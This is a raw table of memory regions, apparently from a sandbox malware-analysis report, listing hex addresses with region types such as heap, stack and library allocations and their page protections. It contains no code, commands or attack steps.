62CF000
|
trusted library allocation
|
page read and write
|
||
777E000
|
heap
|
page read and write
|
||
758000
|
heap
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
D30000
|
direct allocation
|
page read and write
|
||
4B3C000
|
heap
|
page read and write
|
||
217E000
|
stack
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
4A30000
|
trusted library allocation
|
page execute and read and write
|
||
4B25000
|
heap
|
page read and write
|
||
786000
|
heap
|
page read and write
|
||
4B3E000
|
heap
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
4B1E000
|
heap
|
page read and write
|
||
2F0E000
|
stack
|
page read and write
|
||
4B11000
|
heap
|
page read and write
|
||
2F70000
|
heap
|
page read and write
|
||
85E0000
|
trusted library allocation
|
page read and write
|
||
33CD000
|
heap
|
page read and write
|
||
7B7000
|
heap
|
page read and write
|
||
76C9000
|
heap
|
page read and write
|
||
4B4A000
|
heap
|
page read and write
|
||
54F3000
|
heap
|
page read and write
|
||
3122000
|
trusted library allocation
|
page read and write
|
||
27F0000
|
heap
|
page readonly
|
||
7BA000
|
heap
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
23358000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
94F000
|
stack
|
page read and write
|
||
2F95000
|
heap
|
page read and write
|
||
4B11000
|
heap
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
4B3C000
|
heap
|
page read and write
|
||
4B28000
|
heap
|
page read and write
|
||
4B49000
|
heap
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
4A2E000
|
stack
|
page read and write
|
||
776E000
|
heap
|
page read and write
|
||
8390000
|
trusted library allocation
|
page read and write
|
||
4B10000
|
heap
|
page read and write
|
||
23358000
|
heap
|
page read and write
|
||
7840000
|
direct allocation
|
page read and write
|
||
84E4000
|
trusted library allocation
|
page read and write
|
||
4B4E000
|
heap
|
page read and write
|
||
78E0000
|
heap
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
4B1F000
|
heap
|
page read and write
|
||
5276000
|
trusted library allocation
|
page read and write
|
||
2F20000
|
direct allocation
|
page read and write
|
||
8510000
|
trusted library allocation
|
page read and write
|
||
4B25000
|
heap
|
page read and write
|
||
87A9000
|
heap
|
page read and write
|
||
776D000
|
heap
|
page read and write
|
||
77DE000
|
stack
|
page read and write
|
||
4B10000
|
heap
|
page read and write
|
||
4B1C000
|
heap
|
page read and write
|
||
23020000
|
heap
|
page read and write
|
||
2F3B000
|
stack
|
page read and write
|
||
2214000
|
heap
|
page read and write
|
||
2FC0000
|
heap
|
page read and write
|
||
2354C000
|
heap
|
page read and write
|
||
4B35000
|
heap
|
page read and write
|
||
7537000
|
heap
|
page read and write
|
||
4B21000
|
heap
|
page read and write
|
||
5110000
|
heap
|
page execute and read and write
|
||
4B21000
|
heap
|
page read and write
|
||
777E000
|
heap
|
page read and write
|
||
32CD000
|
heap
|
page read and write
|
||
86AC000
|
stack
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
3158000
|
heap
|
page read and write
|
||
4E6E000
|
stack
|
page read and write
|
||
4B8F000
|
heap
|
page read and write
|
||
23B4C000
|
unclassified section
|
page execute and read and write
|
||
3800000
|
heap
|
page read and write
|
||
4B10000
|
heap
|
page read and write
|
||
23020000
|
remote allocation
|
page read and write
|
||
7B1000
|
heap
|
page read and write
|
||
23590000
|
heap
|
page read and write
|
||
752C000
|
heap
|
page read and write
|
||
2314D000
|
stack
|
page read and write
|
||
7740000
|
trusted library allocation
|
page read and write
|
||
798000
|
heap
|
page read and write
|
||
5314000
|
heap
|
page read and write
|
||
2E8C000
|
stack
|
page read and write
|
||
22C7F000
|
stack
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
1BD000
|
stack
|
page read and write
|
||
78A0000
|
direct allocation
|
page read and write
|
||
4B14000
|
heap
|
page read and write
|
||
27C5000
|
heap
|
page read and write
|
||
776D000
|
heap
|
page read and write
|
||
4980000
|
heap
|
page readonly
|
||
4B25000
|
heap
|
page read and write
|
||
232E0000
|
heap
|
page read and write
|
||
7799000
|
heap
|
page read and write
|
||
531F000
|
heap
|
page read and write
|
||
2F90000
|
heap
|
page read and write
|
||
798000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
7799000
|
heap
|
page read and write
|
||
2F10000
|
direct allocation
|
page read and write
|
||
3150000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
2AE4000
|
stack
|
page read and write
|
||
7FD40000
|
trusted library allocation
|
page execute and read and write
|
||
4B18000
|
heap
|
page read and write
|
||
3030000
|
heap
|
page read and write
|
||
6190000
|
trusted library allocation
|
page read and write
|
||
7B1000
|
heap
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
30FD000
|
trusted library allocation
|
page execute and read and write
|
||
8470000
|
trusted library allocation
|
page execute and read and write
|
||
7631000
|
heap
|
page read and write
|
||
3110000
|
trusted library allocation
|
page read and write
|
||
22C80000
|
heap
|
page read and write
|
||
367F000
|
stack
|
page read and write
|
||
27D0000
|
heap
|
page read and write
|
||
2341C000
|
heap
|
page read and write
|
||
846D000
|
trusted library allocation
|
page read and write
|
||
2AC6000
|
stack
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
4FB1000
|
heap
|
page read and write
|
||
77D0000
|
direct allocation
|
page read and write
|
||
98000
|
stack
|
page read and write
|
||
22E90000
|
direct allocation
|
page read and write
|
||
23B46000
|
unclassified section
|
page execute and read and write
|
||
4A47000
|
heap
|
page read and write
|
||
4A40000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
7768000
|
heap
|
page read and write
|
||
4B4A000
|
heap
|
page read and write
|
||
27DD000
|
heap
|
page read and write
|
||
2280000
|
heap
|
page read and write
|
||
2354C000
|
heap
|
page read and write
|
||
7772000
|
heap
|
page read and write
|
||
422000
|
unkown
|
page read and write
|
||
4B8F000
|
heap
|
page read and write
|
||
54E5000
|
heap
|
page read and write
|
||
27CF000
|
stack
|
page read and write
|
||
4B19000
|
heap
|
page read and write
|
||
307E000
|
stack
|
page read and write
|
||
5716000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
4B2E000
|
heap
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
462000
|
unkown
|
page readonly
|
||
4B31000
|
heap
|
page read and write
|
||
7800000
|
direct allocation
|
page read and write
|
||
23231000
|
direct allocation
|
page execute and read and write
|
||
2318E000
|
stack
|
page read and write
|
||
234D3000
|
heap
|
page read and write
|
||
8980000
|
trusted library allocation
|
page execute and read and write
|
||
D60000
|
heap
|
page read and write
|
||
2F29000
|
heap
|
page read and write
|
||
4F29000
|
heap
|
page read and write
|
||
7BA000
|
heap
|
page read and write
|
||
4B37000
|
heap
|
page read and write
|
||
777E000
|
heap
|
page read and write
|
||
4B5E000
|
heap
|
page read and write
|
||
7980000
|
trusted library allocation
|
page read and write
|
||
22C3E000
|
stack
|
page read and write
|
||
7547000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
4DEE000
|
stack
|
page read and write
|
||
745E000
|
stack
|
page read and write
|
||
757B000
|
heap
|
page read and write
|
||
6129000
|
trusted library allocation
|
page read and write
|
||
2F94000
|
heap
|
page read and write
|
||
4B2E000
|
heap
|
page read and write
|
||
56E000
|
unkown
|
page read and write
|
||
9797000
|
trusted library allocation
|
page read and write
|
||
4F6E000
|
stack
|
page read and write
|
||
2F27000
|
heap
|
page read and write
|
||
2F3D000
|
stack
|
page read and write
|
||
3803000
|
heap
|
page read and write
|
||
53B9000
|
heap
|
page read and write
|
||
7940000
|
trusted library allocation
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
4B3A000
|
heap
|
page read and write
|
||
2310C000
|
stack
|
page read and write
|
||
77C0000
|
direct allocation
|
page read and write
|
||
2285000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
8440000
|
heap
|
page read and write
|
||
62BC000
|
trusted library allocation
|
page read and write
|
||
777E000
|
heap
|
page read and write
|
||
3034000
|
heap
|
page read and write
|
||
77B0000
|
direct allocation
|
page read and write
|
||
5A23000
|
trusted library allocation
|
page read and write
|
||
2F50000
|
trusted library section
|
page read and write
|
||
2F2D000
|
heap
|
page read and write
|
||
777E000
|
heap
|
page read and write
|
||
4B1E000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
2357D000
|
heap
|
page read and write
|
||
2336B000
|
heap
|
page read and write
|
||
49EC000
|
stack
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
4B33000
|
heap
|
page read and write
|
||
7890000
|
direct allocation
|
page read and write
|
||
8367000
|
stack
|
page read and write
|
||
7602000
|
heap
|
page read and write
|
||
5121000
|
trusted library allocation
|
page read and write
|
||
22B3D000
|
stack
|
page read and write
|
||
7860000
|
direct allocation
|
page read and write
|
||
4B53000
|
heap
|
page read and write
|
||
2EFD000
|
stack
|
page read and write
|
||
5000000
|
heap
|
page read and write
|
||
26CF000
|
stack
|
page read and write
|
||
22EA0000
|
direct allocation
|
page read and write
|
||
2336B000
|
heap
|
page read and write
|
||
436000
|
heap
|
page read and write
|
||
8A0000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
792000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
4B34000
|
heap
|
page read and write
|
||
230AF000
|
stack
|
page read and write
|
||
4F32000
|
heap
|
page read and write
|
||
890000
|
heap
|
page read and write
|
||
4B1E000
|
heap
|
page read and write
|
||
23020000
|
remote allocation
|
page read and write
|
||
4B31000
|
heap
|
page read and write
|
||
30E0000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
4F6E000
|
stack
|
page read and write
|
||
4B1C000
|
heap
|
page read and write
|
||
517D000
|
trusted library allocation
|
page read and write
|
||
7920000
|
trusted library allocation
|
page read and write
|
||
4B20000
|
heap
|
page read and write
|
||
7950000
|
trusted library allocation
|
page read and write
|
||
331F000
|
stack
|
page read and write
|
||
62D5000
|
trusted library allocation
|
page read and write
|
||
3130000
|
heap
|
page read and write
|
||
5011000
|
heap
|
page read and write
|
||
231CF000
|
stack
|
page read and write
|
||
4B4E000
|
heap
|
page read and write
|
||
520F000
|
stack
|
page read and write
|
||
4B25000
|
heap
|
page read and write
|
There are 743 hidden memdumps, click here to show them.